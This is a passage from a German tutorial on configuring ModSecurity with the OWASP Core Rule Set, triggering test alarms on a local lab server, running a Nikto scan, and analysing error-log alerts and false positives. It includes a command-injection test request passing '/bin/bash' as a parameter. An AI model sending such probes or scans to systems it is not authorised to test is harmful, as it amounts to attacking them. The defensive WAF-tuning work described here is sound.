setenv:ModSecAnomalyScoreInPLs=%{tx.anomaly_score_pl1}-%{tx.anomaly_score_pl2}-%{tx.anomaly_score_pl3}-%{tx.anomaly_score_pl4},\ setenv:ModSecAnomalyScoreOutPLs=%{tx.outbound_anomaly_score_pl1}-%{tx.outbound_anomaly_score_pl2}-%{tx.outbound_anomaly_score_pl3}-%{tx.outbound_anomaly_score_pl4},\ setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score},\ setenv:ModSecAnomalyScoreOut=%{TX.outbound_anomaly_score}" SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem SSLProtocol All -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 SSLCipherSuite 'kEECDH+ECDSA kEECDH kEDH HIGH +SHA !aNULL !eNULL !LOW !MEDIUM !MD5 !EXP !DSS \ !PSK !SRP !kECDH !CAMELLIA !RC4' SSLHonorCipherOrder On SSLRandomSeed startup file:/dev/urandom 2048 SSLRandomSeed connect builtin DocumentRoot /apache/htdocs <Directory /> Require all denied Options SymLinksIfOwnerMatch </Directory> <VirtualHost 127.0.0.1:80> <Directory /apache/htdocs> Require all granted Options None </Directory> </VirtualHost> <VirtualHost 127.0.0.1:443> SSLEngine On Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains" env=HTTPS <Directory /apache/htdocs> Require all granted Options None </Directory> </VirtualHost> ``` Wir haben das CRS eingebettet und sind nun fรผr den Testbetrieb bereit. Die Regeln inspizieren Anfragen und Antworten. Sie werden Alarme auslรถsen, wenn sie etwas merkwรผrdiges in den Requests vorfinden. Aber sie werden keine Transaktion blockieren, da die Anomalie-Limiten sehr hoch eingestellt wurden. Probieren wir das mal aus. ### Schritt 4: Zu Testzwecken Alarme auslรถsen Zum Start machen wir etwas Einfaches. Es ist ein Request, der exakt eine Regel auslรถst, wenn wir auf einfachste Art und Weise versuchen, eine Bash Shell aufzurufen. Wir wissen natรผrlich, dass unser Labor-Server gegenรผber so einer dummen Attacke nicht verwundbar ist. ModSecurity weiss das aber nicht und wird immer noch versuchen uns zu schรผtzen: ```bash $> curl localhost/index.html?exec=/bin/bash <html><body><h1>It works!</h1></body></html> ``` Wie vorausgesagt wurden wir nicht blockiert, aber schauen wir uns die Logs einmal an und schauen wir, ob etwas passiert ist: ```bash $> tail -1 /apache/logs/access.log 127.0.0.1 - - [2019-10-25 08:40:01.881647] "GET /index.html?exec=/bin/bash HTTP/1.1" 200 48 "-" โ€ฆ "curl/7.47.0" localhost 127.0.0.1 40080 - - + "-" WA7@QX8AAQEAABC4maIAAAAV - - 98 234 -% โ€ฆ 7672 2569 117 479 5 0 ``` Es sieht nach einem Standard `GET` Request aus, der den Status 200 retourniert. Der interessante Teil ist das zweite Feld von hinten aus gezรคhlt. In der Anleitung zum Access Log haben wir ein ausfรผhrliches Log-Format definiert, in dem wir zwei Positionen fรผr die beiden Anomaly Scores reserviert haben. Bis dato waren diese Werte leer; jetzt werden sie aber gefรผllt. Der erste der beiden Werte ist der Wert fรผr den Request, der zweite den fรผr die Antwort. Unsere Anfrage mit dem Parameter `/bin/bash` gab uns einen Anomalie-Wert von 5. Dies wird vom CRS als kritische Regelverletzung betrachtet. Eine Verletzung der Stufe *Error* ergibt 4 Punkte, eine Warnung 3 und bei einer Notiz sind es noch 2 Punkte. Wenn man die CRS Regeln รผberblickt, dann zeigt sich, dass die allermeisten eine kritische Verletzung beschreiben und jeweils einen Wert von 5 zuweisen. Aber eigentlich mรถchten wir ja wissen, welche Regel den Alarm auslรถste. Wir kรถnnen einfach des Ende des Error Logs ausgeben. Aber benรผtzen wir doch die Unique ID um alle Nachrichten aus dem Error Log herauszufiltern, welche unseren Request betreffen. Die Unique ID war Teil des Access Logs (*WA7@QX8AAQEAABC4maIAAAAV*), das ist also sehr einfach. ```bash [2019-10-25 08:40:01.881938] [authz_core:debug] 127.0.0.1:42732 WA7@QX8AAQEAABC4maIAAAAV AH01626:โ€ฆ authorization result of Require all granted: granted [2019-10-25 08:40:01.882000] [authz_core:debug] 127.0.0.1:42732 WA7@QX8AAQEAABC4maIAAAAV AH01626:โ€ฆ authorization result of <RequireAny>: granted [2019-10-25 08:40:01.884172] [-:error] 127.0.0.1:42732 WA7@QX8AAQEAABC4maIAAAAV โ€ฆ [client 127.0.0.1] ModSecurity: Warning. Matched phrase "/bin/bash" at ARGS:exec. โ€ฆ [file "/apache/conf/crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "448"] โ€ฆ [id "932160"] [rev "1"] [msg "Remote Command Execution: Unix Shell Code Found"] โ€ฆ [data "Matched Data: /bin/bash found within ARGS:exec: /bin/bash"] [severity "CRITICAL"] โ€ฆ [ver "OWASP_CRS/3.1.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] โ€ฆ [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] โ€ฆ [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] โ€ฆ [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/index.html"] โ€ฆ [unique_id "WA7@QX8AAQEAABC4maIAAAAV"] ``` Das Authorisierungsmodul rapportiert zwei Mal im Logfile auf Stufe Debug. Aber auf der dritten Zeile sehen wir den Alarm, den wir suchen. Schauen wir uns das im Detail an. Die CRS Logeintrรคge enthalten viel mehr Informationen als eine normale Apache Meldung, so dass es sich wirklich lohnt, das Logformat noch einmal im Detail zu betrachten. Der Beginn der Zeile besteht aus apache-spezifischen Teilen wie dem Zeitstempel und der Severity, also dem Schweregrad der Meldung, so wie der Server es betrachtet. *ModSecurity* Nachrichten besitzen immer die Stufe *Error*. Das Logformat von ModSecurity und das Apache Error Log, so wie wir es definiert haben, besitzen einige Redundanzen. Das erste Auftauchen der IP Adresse des Clients mit der Source Port Nummer und die Unique ID des Requests werden von Apache geschrieben. Die eckigen Klammern mit derselben Client IP Adresse markiert den Beginn der ModSecurity Alarm Meldung. Die charakteristische Markierung des CRS ist `ModSecurity: Warning`. Es beschreibt, dass eine Regel ausgelรถst wurde, ohne dass die Anfrage blockiert worden wรคre. Dies zeigt, dass die Regel ausgeschlagen hat, aber lediglich der Anomalie-Wert erhรถht wurde. Es ist sehr einfach zwischen einem Alarm und einer tatsรคchlichen Blockade zu unterscheiden. Namentlich weil die einzelnen Regeln ja nie blockieren, sondern immer nur den Zรคhler erhรถhen. Die Blockage selbst wird von einer separaten Regel ausgelรถst, welche den Anomalie-Wert รผberprรผft. Aber da wir ja eine sehr hohe Limite gesetzt haben, dรผrfen wir annehmen, dass das nicht so schnell passiert. ModSecurity umschreibt Regelverletzungen immer als *ModSecurity. Warning ...*. Die Blockaden werden dann als *ModSecurity. Access denied ...* rapportiert. Eine Warnung hat nie einen direkten Einfluss auf den Client: Solange wir kein *Access denied ...* sehen, kรถnnen wir sicher sein, dass ModSecurity den Client und seine Anfrage nicht beeintrรคchtigt hat. Was folgt darauf? Eine Referenz auf das Zeichenmuster, das in der Anfrage gefunden wurde. Die spezifische Muster `/bin/bash` wurde im Parameter `exec` entdeckt. Dann folgt eine Serie mit Informationsbrocken mit demselben, sich wiederholenden Format: Sie stehen in Klammern und besitzen ihren eigenen Identifikator. Zunรคchst sehen wir den *file* Identifikator. Er zeigt an, in welchem File die Regel, welche den Alarm auslรถste, zu finden ist. Dies wird von der Zeilennummer innerhalb der Datei gefolgt. Der *id* Parameter ist wichtig. Die Regel *932160*, um die es hier geht, befindet sich in der Gruppe von Regeln, welche sich gegen Remote Command Execution wehren, also gegen das ausfรผhren von Kommandos auf unserem Server. Diese sind im Block 932'000 bis 932'999 definiert. Dann folgt *rev* als Referenz an die Revisionsnummer der Regel. Im CRS macht dieser Wert eine Aussage darรผber wie oft eine Regel revidiert worden ist. Wenn sie revidiert wird, dann wird *rev* um eines erhรถht. Der Wert ist aber nicht immer prรคsent und man sollte sich nicht zusehr darauf verlassen. Das Kรผrzel *msg*, kurz fรผr *message*, beschreibt den Typ der Attacke der entdeckt worden ist. Der relevante Teil des Anfrage, der *exec* Parameter, erscheint im Block *data*. In meinem Beispiel geht es also ganz klar um einen Fall von *Remote Code Execution* (RCE). Dann folgt die Schwere des Regelverstosses, der *Severity Level*. Dies korrespondiert mit dem Anomalie-Wert der Regel. Wir haben bereits festgestellt, dass es sich um eine kritische Regelverletzung handelt. Deshalb wird die dies auch hier auf dieser Stufe rapportiert. Mit *ver* kommen wir zur Release-Identifikation des CRS, gefolgt von *maturity* und dann *accuracy*. Beide Werte sind als Referenz auf die Qualitรคt einer Regel gemeint. Aber der Support ist inkonsistent und man sollte den Werten nicht allzu sehe vertrauen. Dann kommen wir zu den Tags, die der Regel zugewiesen sind. Sie werden jedem Alarm mitgegeben. Die Tags klassifizieren den Typ der Attacke. Die Referenzen kรถnnen zum Beispiel fรผr die Analyse und die Statistik eingesetzt werden. Zum Ende folgen drei weitere Werte, Hostname, URI und Unique ID, welche den Request noch etwas klarer definieren (Die *unique_id*, bereits durch Apache gelistet, ist etwas redundant). Damit haben wir die komplette Alarmmeldung, welche zu einem Anomalie-Wert von 5 fรผhrte, untersucht. Es handelte sich nur um eine einzige Anfrage mit einem einzigen Alarm. Generieren wir doch mal weitere Alarme. *Nikto* ist ein einfaches Hilfsmittel, das uns in dieser Situation helfen kann. Es ist ein Security Sanner, der seit Urzeiten existiert. Er ist nicht sehr mรคchtig, aber einfach in der Benutzung und sehr schnell. Also genau das richtige Tool, um viele Alarme zu generieren. *Nikto* muss vermutlich noch installiert werden. Der Scanner ist aber in den meisten Distributionen enthalten. ```bash $> nikto -h localhost - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 127.0.0.1 + Target Hostname: localhost + Target Port: 80 + Start Time: 2019-03-21 07:50:40 (GMT1) --------------------------------------------------------------------------- + Server: Apache + Server leaks inodes via ETags, header found with file /, fields: 0x2d 0x56852b3a6389e + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD + 6544 items checked: 0 error(s) and 3 item(s) reported on remote host + End Time: 2019-03-21 07:51:19 (GMT1) (39 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` Dieser Scan dรผrfte zahlreiche *ModSecurity Alarme* auf dem Server ausgelรถst haben. Werfen wir einen Blick auf das Error Log. In meinem Fall gab es mehr als 13'300 Eintrรคge. Wenn wir diese diese mit den zahlreichen Authorisierungsnachrichten und den Hinweisen auf die zahlreichen 404er (Nikto Proben auf Dateien, welche auf unserem Server nicht vorhanden sind) zusammennehmen, dann landen wir sehr schnell bei einem rapide wachsenden Error Log. Der einzelne Nikto-Lauf fรผhrte bei mir zu einer Logdatei von 11 MB. Wenn wir รผber den Baum mit den Audit Logs schauen, dann sehen wir sogar 92 MB Logfiles. Es ist offensichtlich: Man muss ein genaues Auge auf diese Log-Dateien halten oder der Server bricht unter einer Denial of Service Attacke auf die schiere Grรถsse der Logfiles zusammen. ### Schritt 5: Analysieren der Alarme Wir betrachten also 7'300 Alarme. Und selbst wenn das Format der Eintrรคge jetzt klar ist, ohne ein Hilfsmittel ist das alles sehr schwer zu lesen, geschweige denn zu analysieren. Eine einfache Abhilfe sind einige *Shell Aliase*, welche individuelle Informationsteile aus den Eintrรคgen herausschneidet. Diese neuen Aliase sind bereits im Alias-File vorhanden, das wir in der Anleitung zu dem Logformat des Access Logs betrachtet haben. ``` $> cat ~/.apache-modsec.alias ... alias meldata='grep -o "\[data [^]]*" | cut -d\" -f2' alias melfile='grep -o "\[file [^]]*" | cut -d\" -f2' alias melhostname='grep -o "\[hostname [^]]*" | cut -d\" -f2' alias melid='grep -o "\[id [^]]*" | cut -d\" -f2' alias melip='grep -o "\[client [^]]*" | cut -b9-' alias melidmsg='sed -e "s/.*\[id \"//" -e "s/\([0-9]*\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" alias melline='grep -o "\[line [^]]*" | cut -d\" -f2' alias melmatch='grep -o " at [^\ ]*\. \[file" | sed -e "s/\. \[file//" | cut -b5-' alias melmsg='grep -o "\[msg [^]]*" | cut -d\" -f2' alias meltimestamp='cut -b2-25' alias melunique_id='grep -o "\[unique_id [^]]*" | cut -d\" -f2' alias meluri='grep -o "\[uri [^]]*" | cut -d\" -f2' ... ``` Diese Abkรผrzungen beginnen mit dem Prรคfix *mel*, kurz fรผr *ModSecurity error log*, gefolgt vom Feldnamen. Versuchen wir es, die Regel-IDs aus den Nachrichten auszugeben: ``` $> cat logs/error.log | melid | tail 920440 913100 913100 913100 913100 913100 913100 913100 913100 920440 ``` Das scheint das zu machen, was wir erwarten. Erweitern wir das Beispiel in ein paar Schritten: ``` $> cat logs/error.log | melid | sort | uniq -c | sort -n 1 920220 1 932115 2 920280 2 941140 3 942270 4 933150 5 942100 6 932110 7 911100 8 932105 13 932100 15 941170 15 941210 17 920170 29 930130 35 932150 67 933130 70 933160 111 932160 113 941180 114 920270 140 931110 166 930120 172 930100 224 920440 245 941110 247 941100 247 941160 448 930110 2262 931120 2328 913120 6168 913100 $> cat logs/error.log | melid | sort | uniq -c | sort -n | while read STR; do echo -n "$STR "; \ ID=$(echo "$STR" | sed -e "s/.*\ //"); grep $ID logs/error.log | head -1 | melmsg; done 1 920220 URL Encoding Abuse Attack Attempt 1 932115 Remote Command Execution: Windows Command Injection 2 920280 Request Missing a Host Header 2 941140 XSS Filter - Category 4: Javascript URI Vector 3 942270 Looking for basic sql injection. Common attack string for mysql, oracle and others. 4 933150 PHP Injection Attack: High-Risk PHP Function Name Found 5 942100 SQL Injection Attack Detected via libinjection 6 932110 Remote Command Execution: Windows Command Injection 7 911100 Method is not allowed by policy 8 932105 Remote Command Execution: Unix Command Injection 13 932100 Remote Command Execution: Unix Command Injection 15 941170 NoScript XSS InjectionChecker: Attribute Injection 15 941210 IE XSS Filters - Attack Detected. 17 920170 GET or HEAD Request with Body Content. 29 930130 Restricted File Access Attempt 35 932150 Remote Command Execution: Direct Unix Command Execution 67 933130 PHP Injection Attack: Variables Found 70 933160 PHP Injection Attack: High-Risk PHP Function Call Found 111 932160 Remote Command Execution: Unix Shell Code Found 113 941180 Node-Validator Blacklist Keywords 114 920270 Invalid character in request (null character) 140 931110 Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name โ€ฆ 166 930120 OS File Access Attempt 172 930100 Path Traversal Attack (/../) 224 920440 URL file extension is restricted by policy 245 941110 XSS Filter - Category 1: Script Tag Vector 247 941100 XSS Attack Detected via libinjection 247 941160 NoScript XSS InjectionChecker: HTML Injection 448 930110 Path Traversal Attack (/../) 2262 931120 Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question โ€ฆ 2328 913120 Found request filename/argument associated with security scanner 6168 913100 Found User-Agent associated with security scanner ``` Damit kรถnnen wir arbeiten. Aber es ist vielleicht notwendig, die Kommandos zu erklรคren. Wir extrahieren die Regel-IDs aus dem Error Log, dann sortieren wir sie, summieren sie mittels `uniq -c` und sortieren sie wieder nach der Anzahl der gefundenen Zahlen. Das ist der erste Kommando-Block. Eine Beziehung zwischen den einzelnen Regeln fehlt noch, denn mit der ID-Nummer ist noch nicht viel anzufangen. Wir erhalten die Namen aus dem Error Log, indem wir den vorher durchgefรผhrten Test zeilenweise in einer Schleife durchfรผhren. Wir fรผllen die ID, welche wir haben, in die Schleife (`$STR`). Dann separieren wir die Anzahl der jeweils pro ID gefundenen Alarme wieder von der ID. Die geschieht mittels einem eingebetteten Unterbefehls (`ID = $ (echo" $ STR "| sed -e" s /.* \ // ")`). Wir verwenden dann die IDs, die wir gerade gefunden haben, um das Error-Log noch einmal fรผr einen Eintrag zu durchsuchen. Wir nehmen aber nur die erste Fundstelle und Extrahieren den *msg* Teil und zeigen ihn an. Fertig. Man kรถnnte jetzt denken, dass es besser wรคre, einen zusรคtzlichen Alias zu definieren, um die ID und die Beschreibung der Regel in einem einzigen Schritt zu definieren. Dies fรผhrt uns jedoch auf den falschen Weg, denn es gibt Regeln, die dynamische Teile in und nach den Klammern enthalten (zum Beispiel Anomalie-Werte in den Regeln, die den Schwellenwert รผberprรผfen: ID 949110 und 980130!). Das wรผrde also nicht klappen. Denn natรผrlich wollen wir diese Alarme kombinieren und zusammenfรผgen, um die Regel nur einmal zuzuordnen. Um die Analyse wirklich zu vereinfachen, mรผssen wir die dynamischen Elemente herauslรถschen. Hier ist ein zusรคtzlicher Alias, der diese Idee implementiert und auch Teil der `.apache-modsec.alias` Datei ist: ```bash alias melidmsg='sed -e "s/.*\[id \"//" -e "s/\([0-9]*\).*\[msg \"/\1 /" -e "s/\"\].*//" \ -e "s/(Total .*/(Total ...) .../" \ -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../"' ``` ```bash $> cat logs/error.log | melidmsg | sucs 1 920220 URL Encoding Abuse Attack Attempt 1 932115 Remote Command Execution: Windows Command Injection 2 920280 Request Missing a Host Header 2 941140 XSS Filter - Category 4: Javascript URI Vector 3 942270 Looking for basic sql injection. Common attack string for mysql, oracle and others. 4 933150 PHP Injection Attack: High-Risk PHP Function Name Found 5 942100 SQL Injection Attack Detected via libinjection 6 932110 Remote Command Execution: Windows Command Injection 7 911100 Method is not allowed by policy 8 932105 Remote Command Execution: Unix Command Injection 13 932100 Remote Command Execution: Unix Command Injection 15 941170 NoScript XSS InjectionChecker: Attribute Injection 15 941210 IE XSS Filters - Attack Detected. 17 920170 GET or HEAD Request with Body Content. 29 930130 Restricted File Access Attempt 35 932150 Remote Command Execution: Direct Unix Command Execution 67 933130 PHP Injection Attack: Variables Found 70 933160 PHP Injection Attack: High-Risk PHP Function Call Found 111 932160 Remote Command Execution: Unix Shell Code Found 113 941180 Node-Validator Blacklist Keywords 114 920270 Invalid character in request (null character) 140 931110 Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload 166 930120 OS File Access Attempt 172 930100 Path Traversal Attack (/../) 224 920440 URL file extension is restricted by policy 245 941110 XSS Filter - Category 1: Script Tag Vector 247 941100 XSS Attack Detected via libinjection 247 941160 NoScript XSS InjectionChecker: HTML Injection 448 930110 Path Traversal Attack (/../) 2262 931120 Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?) 2328 913120 Found request filename/argument associated with security scanner 6168 913100 Found User-Agent associated with security scanner ``` Das bringt uns weiter. Es zeigt sich, dass das Core Rule Set viele bรถswillige Anfragen entdeckt hat und wir haben jetzt eine Idee, welche Regeln dabei eine Rolle spielten. Die Regel, die am hรคufigsten ausgelรถst wurde, *913120*, ist keine รœberraschung, und wenn man in der Ausgabe nach oben schaut, macht das alles wirklich Sinn. ### Schritt 6: Falsche Alarme auswerten Der *Nikto* Scan lรถste also tausende von Alarmen aus. Sie waren wahrscheinlich gerechtfertigt. In der normalen Verwendung von *ModSecurity* stehen die Dinge freilich etwas anders aus. Das Core Rule Set wurde so konzipiert und optimiert, dass sie in der Paranoia Stufe 1 so wenige Fehlalarme wie mรถglich auslรถsen. Doch in der Produktion wird es frรผher oder spรคter False Positives geben. Je nach Anwendung sind sie hรคufiger oder seltener. Aber selbst eine normale Installation dรผrfte frรผher oder spรคter Fehlalarme aufweisen. Und wenn wir den Paranoia Level erhรถhen, um gegenรผber Angriffen wachsamer zu sein, dann wird auch die Menge der False Positives ansteigen. Sehr steil wird der Anstieg, wenn wir bis zu PL 3 oder 4 gehen. So steil, dass es einige explodieren nennen wรผrden. Um reibungslos laufen zu kรถnnen, muss zuerst die Konfiguration fein abgestimmt werden. Legitime Antrรคge und Angriffsversuche mรผssen unterschieden werden kรถnnen. Wir wollen ein grosse Trennschรคrfe erreichen. Wir wollen *ModSecurity* und das CRS so konfigurieren, dass das System genau weiss, wie man zwischen legitimen Anfragen und Angriffen unterscheidet. Es gibt zwei Arten von Fehlverhalten der Rrgeln. Weiter oben haben wir Fehlalarme bereits diskutiert; wir nennen sie *False Positives*. Angriffe, die nicht erkannt werden, werden als *False Negatives* bezeichnet. Die Core Rules sind strikt und sehr sorgfรคltig, um die Anzahl der *Falschen Negatives* niedrig zu halten. Ein Angreifer muss viel Detailwissen besitzen, um das Regelwerk umgehen zu kรถnnen; gerade in den hรถheren Paranoia-Levels. Leider fรผhrt diese Strenge auch dazu, dass Alarme fรผr normale Anfragen ausgelรถst werden. Meist weist es auf eine ungenรผgende Trennschรคrfe hin, wenn *False Positives* oder *False Negatives* vorkommen. Beide Werte hรคngen eng zusammen: Reduziert man die Menge der *False Negatives* erhรคlt man dafรผr mehr *False Positives* und umgekehrt. Beide korrelieren stark miteinander. Wir mรผssen diesen Zusammenhang รผberwinden: Wir wollen die Trennschรคrfe erhรถhen, um die Anzahl der *False Positives* zu verringern, ohne die Anzahl der *Falschen Negatives* zu erhรถhen. Wir kรถnnen dies durch Feinabstimmung des Regelwerks an einigen wenigen Stellen tun. Fรผr bestimmte Anfragen oder Parameter mรผssen dazu bestimmte Regeln ausgeschlossen werden. Aber zuerst mรผssen wir ein klares Bild von der aktuellen Situation haben: Wie viele *False Positives* gibt es und welche der Regeln werden in einem bestimmten Kontext verletzt? Wie viele *False Positives* sind wir bereit, auf dem System zu erlauben? Sie auf Null zu reduzieren ist sehr herausfordernd, wenn man den Schutz aufrecht erhalten will. Aber wir kรถnnen mit Prozentsรคtzen arbeiten. Ein mรถgliches Ziel wรคre: 99,99% der legitimen Anfragen sollten passieren, ohne von der WAF blockiert zu werden. Dies ist realistisch, erfordert aber je nach Anwendung ein wenig Arbeit. 99,99% der Anfragen ohne einen falschen Alarm ist auch eine Zahl, wo professionelle Nutzung beginnt. Aber ich habe Setups, wo wir nicht bereit sind, mehr als 1 falscher Alarm in 1 Million von Anfragen zu akzeptieren. Das sind 99,9999%. Um ein solches Ziel zu erreichen, benรถtigen wir ein oder zwei Werkzeuge, um uns eine gute Basis zu verschaffen. Genauer gesagt, mรผssen wir mehr รผber die Zahlen herausfinden. Dann, in einem zweiten Schritt betrachten wir das Error Log, um zu verstehen, welche Regeln genau zu den Alarmen gefรผhrt haben. Wir haben gesehen, dass das Zugriffslog die Anomalie-Werte der Anfragen rapporiert. Versuchen wir diese Werte zu extrahieren und sie in einer passenden Form darzustellen. In der Anleitung 5 arbeiteten wir mit einer Beispielprotokolldatei mit 10'000 Eintrรคgen. Wir verwenden diese Protokolldatei erneut: [tutorial-5-example-access.log](https://www.netnea.com/files/tutorial-5-example-access.log). Die Datei kommt von einem echten Server, aber die IP-Adressen, Servernamen und Pfade wurden vereinfacht oder umgeschrieben. Die Informationen, die wir fรผr unsere Analyse benรถtigen, sind aber noch da. Werfen wir doch mal einen Blick auf die Verteilung der Anomalie-Werte: ``` $> egrep -o "[0-9-]+ [0-9-]+$" tutorial-5-example-access.log | cut -d\ -f1 | sucs 3 10 5 3 6 2 55 5 9931 0 $> egrep -o "[0-9-]+$" tutorial-5-example-access.log | sucs 10000 0 ``` Die erste Befehlszeile liest die eingehenden Anomalie-Werte. Es ist der zweitletzte Wert auf der Access-log Zeile. Wir nehmen die beiden letzten Werte (*egrep*) und dann schneiden wir den ersten mittels *cut* heraus. Danach sortieren wir die Ergebnisse mit dem vertrauten *sucs* alias. Der ausgehende Anomalie Wert ist der letzte Wert auf der Logzeile. Aus diesem Grund braucht es keinen *cut*-Befehl in der zweiten Kommandozeile. Die Ergebnisse geben uns eine Vorstellung von der Situation: Die รผberwiegende Mehrheit der Anfragen passiert das ModSecurity-Modul ohne Regelverstoss: 9931 Anfragen mit der Punktzahl 0. 69 Anfragen verletzten eine oder mehrere Regeln. Das sind relative viele fรผr eine Core Rule Set 3.1 Installation. In der Tat, ich habe zusรคtzliche falsche Alarme provoziert, um wirklich etwas zu sehen. Denn das CRS ist heutzutage soweit optimiert, dass es viel Verkehr braucht, um eine gewisse Menge an Alarmen zu erhalten - oder wir mรผssten den Paranoia Level auf einem nicht abgestimmten System sehr hoch einstellen. Ein Wert von 10 erscheint dreimal, was zwei Verstรถssen in derselben Anfrage entspricht (die meisten Regeln erhalten 5 Punkte, wenn sie verletzt werden). Das ist in der Praxis ziemlich รผblich. Aller Wahrscheinlichkeit nach werden wir eine ganze Reihe von Verstรถssen durch die Anfragen und nur sehr wenige Alarme durch die Antworten sehen; in unserem Beispiel oben 0. Aber das gibt uns immer noch nicht die richtige Vorstellung von den *Tuning-Schritten*, die notwendig wรคren, um diese Installation reibungslos auszufรผhren. Um diese Informationen in einer geeigneten Form darzustellen, habe ich ein Ruby-Skript vorbereitet. Es analysiert die *Anomaliewerte*. Das Skript lรคsst sich hier herunterladen: [modsec-positive-stats.rb](https://www.netnea.com/files/modsec-positive-stats.rb). Platzieren Sie es in Ihrem privaten _bin_ Verzeichnis (Sie mรผssen mรถglicherweise das _ruby_-Paket installieren, damit es funktioniert). Es nimmt die beiden Anomaliewerte als Eingabe und erwartet sie durch einen Strichpunkt getrennt. Wir kรถnnen das wie folgt bewerkstelligen: ``` $> cat tutorial-5-example-access.log | egrep -o "[0-9-]+ [0-9-]+$" | tr " " ";" | modsec-positive-stats.rb INCOMING Num of req. | % of req. | Sum of % | Missing % Number of incoming req. (total) | 10000 | 100.0000% | 100.0000% | 0.0000% Empty or miss. incoming score | 0 | 0.0000% | 0.0000% | 100.0000% Reqs with incoming score of 0 | 9931 | 99.3100% | 99.3100% | 0.6900% Reqs with incoming score of 1 | 0 | 0.0000% | 99.3100% | 0.6900% Reqs with incoming score of 2 | 6 | 0.0600% | 99.3700% | 0.6300% Reqs with incoming score of 3 | 5 | 0.0500% | 99.4200% | 0.5800% Reqs with incoming score of 4 | 0 | 0.0000% | 99.4200% | 0.5800% Reqs with incoming score of 5 | 55 | 0.5499% | 99.9700% | 0.0300% Reqs with incoming score of 6 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 7 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 8 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 9 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 10 | 3 | 0.0300% | 100.0000% | 0.0000% Incoming average: 0.0332 Median 0.0000 Standard deviation 0.4163 OUTGOING Num of req. | % of req. | Sum of % | Missing % Number of outgoing req. (total) | 10000 | 100.0000% | 100.0000% | 0.0000% Empty or miss. outgoing score | 0 | 0.0000% | 0.0000% | 100.0000% Reqs with outgoing score of 0 | 10000 | 100.0000% | 100.0000% | 0.0000% Outgoing average: 0.0000 Median 0.0000 Standard deviation 0.0000 ``` Das Skript trennt die Scores der eingehenden Anfragen von den Werten der Antworten. Die eingehenden werden zuerst behandelt. Bevor das Skript die Ergebnisse verarbeiten kann, beschreibt es, wie oft ein leerer Wert gefunden wurde. In unserem Fall war das 41 Mal so, wie wir gesehen haben. Dann kommt die Aussage fรผr den Zahlenwert 0: 9920 Requests. Dies deckt 99,2% der Anfragen ab. Zusammen mit den leeren Werten liegen wir bereits bei 99,61% (*Sum of %*). 0,39% hatten einen hรถheren Anomalie Wert (*Missing %*). Wir hatten uns ja gesagt, dass 99,99% der Anfragen den Server ohne Alarme passieren kรถnnen sollten. Wir sind damit etwa 0,38% oder 38 Anfragen von diesem Ziel entfernt. Der nรคchste vorkommende Anomalie Wert ist 2. Er erscheint 11 mal oder in etwa 0,11% der Requests. Der Anomalie Wert 3 erscheint 17 Mal und eine Punktzahl von 5 kann 8 Mal gefunden werden. Alles in allem sind wir damit bei 99,97% angelangt. Dann gibt es einen einzigen Request mit einer Punktzahl von 21 und schliesslich 2 Anfragen mit einer Punktzahl von 41. Um eine Deckung von 99,99% zu erreichen, mรผssen wir bis zu diesem Wert tunen. Aufgrund der 2 Anfragen mit 41 Punkten mรผssen wir hier faktisch eine Abdeckung von 100% erreichen. In den oben rapportieren Werten gibt es vermutlich einige *False Positives*. In der Praxis mรผssen wir das ganz klar bestimmen, bevor wir mit der Feinabstimmung des Services beginnen. Es wรคre vรถllig falsch, ein False Positive auf Grund eines berechtigten Alarms anzunehmen, den Alarm in der Zukunft zu unterdrรผcken und einen Angriff so zu verpassen. Vor dem Tuning mรผssen wir sicherstellen, dass keine Angriffe in der Protokolldatei vorhanden sind. Das ist nicht immer einfach. Manuelle รœberprรผfung hilft, man kann sich auf bekannte IP-Adressen beschrรคnken, Pre-Authentifizierung, Testen / Tuning auf ein Test-System getrennt vom Internet, Filterung des Access-Protokoll nach Herkunftsland oder fรผr eine bekannte IP-Adresse, etc.. Es gibt viele Mรถglichkeiten und es ist ein so grosses Thema, dass es schwierig ist, allgemein Empfehlungen zu machen. Aber das Problem muss auf jeden Fall sehr ernst genommen werden. ### Step 7: Behandlung von False Positives: Einzelne Regeln ausschalten Der einfache Umgang mit einem False Positive besteht darin, die Regel einfach zu deaktivieren. Wir unterdrรผcken also den Alarm, in dem wir die Regel aus dem Regelsatz ausschliessen. Der CRS-Begriff fรผr diese Technik heisst *Rules Exclusion* oder *Exclusion Rules*. Das Wort Regel kommt vor, weil dieser Ausschluss das Schreiben von Regeln oder Direktiven beinhaltet, die selbst wieder Regeln entsprechen. Das Ausschliessen einer Regel macht wenig Aufwand, aber es ist natรผrlich potenziell riskant, da die Regel nicht nur fรผr legitime Benutzer deaktiviert wird, sondern auch fรผr Angreifer. Durch die vollstรคndige Deaktivierung einer Regel beschrรคnken wir die Fรคhigkeit von *ModSecurity*. Oder, drastischer ausgedrรผckt, ziehen wir der WAF die Zรคhne. Vor allem bei hรถheren Paranoia-Niveaus gibt es Regeln, die einfach mit gewissen Anwendungen einfach nicht 